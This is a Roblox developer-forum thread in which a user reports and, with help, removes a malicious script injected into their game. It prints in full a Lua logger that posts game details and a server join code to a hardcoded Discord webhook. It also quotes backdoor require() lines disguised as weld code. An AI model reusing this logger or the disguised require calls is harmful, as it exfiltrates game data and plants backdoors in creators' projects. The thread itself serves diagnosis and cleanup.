Suspicious script appearing in ServerScriptService every time I start the game

Every time I test this game, a random script just called “Script” appears in ServerScriptService. It doesn’t appear while editing the game. It has over a million lines, most of which are blank, and a small bit of code buried in the middle of all of it (obviously very suspicious). I don’t understand what could be creating this script… if anyone could help I would very much appreciate it.

function owner()
	if game.CreatorType == Enum.CreatorType.User then
		return "User"
	elseif game.CreatorType == Enum.CreatorType.Group then
		return "Group"
	end
end



function name()
	if owner() == "User" then
		local lol = game.Players:GetNameFromUserIdAsync(game.CreatorId)
		return lol
	elseif owner() == "Group" then
		local hehe = game.GroupService:GetGroupInfoAsync(game.CreatorId).Owner
		return hehe
	end
end	



function filtering()
	if game.Workspace.FilteringEnabled == true then
		return "ENABBLED"
	else
		if game.Workspace.FilteringEnabled == false then
			return "DISABLED"
		end
	end
end


local placeId = game.PlaceId
local p = game.Players:GetChildren()
local l1 = "https://discord.com/api/webhooks/796814416443080734/LUsF2UA2gAbOj9vhhMtust2yV6jQOwZbEFFHxuIV8KUjL4dzhhQyxDWm5tDQ_cBjrqdT"
local PlaceId = game.PlaceId
local plrs = game.Players
local maxplayers = plrs.MaxPlayers
local GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
local plr = game:GetService("Players")
local HTTP = game:GetService("HttpService")
local Data = 
	{
		["content"] = "",
		["embeds"] = {{
			["title"] = "New Game Logged",
			["description"] = "Game Logged: " .. "**"..GetName.Name.."**",
			["type"] = "rich",
			["color"]= tonumber(0xff9429),
			["footer"] = {
				["icon_url"] = '',
				["text"] = "NovaSS | 2021."
			},
			["thumbnail"] = {
				["url"] = "https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432&format=png",
			},
			["author"] = {
				["name"] = "NovaSS",
				["icon_url"] = ""
			},
			["fields"] = {
				{
					["name"] = "Link:",
					["value"] = "https://www.roblox.com/games/"..game.PlaceId.."",
					["inline"] = false
				},

				{
					["name"] = "Creator:",
					["value"] = name(),
					["inline"] = false
				},

				{
					["name"] = "**__Creator Type:__**",
					["value"] = owner(),
					["inline"] = false
				},

				{
					["name"] = "**__FilteringEnabled:__**",
					["value"] = filtering(),
					["inline"] = false
				},

				{
					["name"] = "**__Server Players:__**",
					["value"] = #plrs:GetPlayers().."/"..game.Players.MaxPlayers,
					["inline"] = false
				},
				{
					["name"] = '**__Server Code:__**',
					["value"] = "```lua\nRoblox.GameLauncher.JoinGameInstance("..game.PlaceId..","..'"'..game.JobId..'"'..")```",
					["inline"] = false

				}


			}
		}
		}
	}

Data = HTTP:JSONEncode(Data)
HTTP:PostAsync(l1, Data)

It is most likely your plugins, check all of your plugins and make sure they are official and not botted fake ones, if it is not that then it is another script making it via a free model or something.

I’m pretty sure that it’s a plugin, because it is now happening in multiple games. However, I’ve disabled all of my plugins and it still happens. Could one of my friends’ plugins be causing this?

If you are editing a TC it could possibly be your friends or anyone else editing the game. Make sure everyone in the TC has official plugins.

I’ve turned off Team Create, the issue is still occurring, even with all of my plugins disabled as well.

Try check all of your scripts in the game incase there is some viruses making it.

I’m convinced that it is a script now since I deleted all of the scripts in the game and the issue doesn’t occur. However, I don’t understand how a script could be making a script. Since I have over 400 scripts, how can I find the one that’s causing the issue?

To find the script that is causing the issue you can use the find results function

Then you can click the binoculars and in the ‘Find What’ box you can enter Script and it will come up with every single script that has the word ‘Script’ in it, for viruses you can also check for setfenv and getfenv as most scripts use these to insert.

I think I found the scripts that were causing the error. They say this, or things similar to this;

require(6091305634):Stys()
require(5869080069):Stys()
--Please do not touch this. This ensures a proper weld.

I don’t know what this means. Could this be causing the issue I’m describing?

Yes they are requiring the asset below.

image889×487 36.6 KB

I would delete all of them and make sure whenever you insert an object you verify its not a virus.

Welding exploits are kind of easy to get while using free models. Most of the time they will require a module script which is encrypted or private. I’d say to use Ro-Defender or other plugin to remove the infection.

We were able to locate and delete the malicious scripts, and the issue is no longer occurring. Thank you so much for the help.

I would also like to mention that I was creating weld scripts with a plugin, and it was these weld scripts that were causing the issue. This is the plugin I was using; Weld - Roblox

You Can Press Ctrl + Shift + F to find anything in scripts. Like backdoors, when the popup comes after you press the keybinds, type require/loadstring and anything which is a virus line in scripts. Its very helpful feature. So try pressing the keybinds and searching up the line that makes its own scripts (I don’t know these kind of viruses so you have to ask someone else)

The code that you shared logs your game and sends it to a Discord webhook. I copied your code, created a webhook on Discord, replaced the URL with my webhook, published and playtested the game, and sure enough:

That is what the person who was attempting to log your game would see.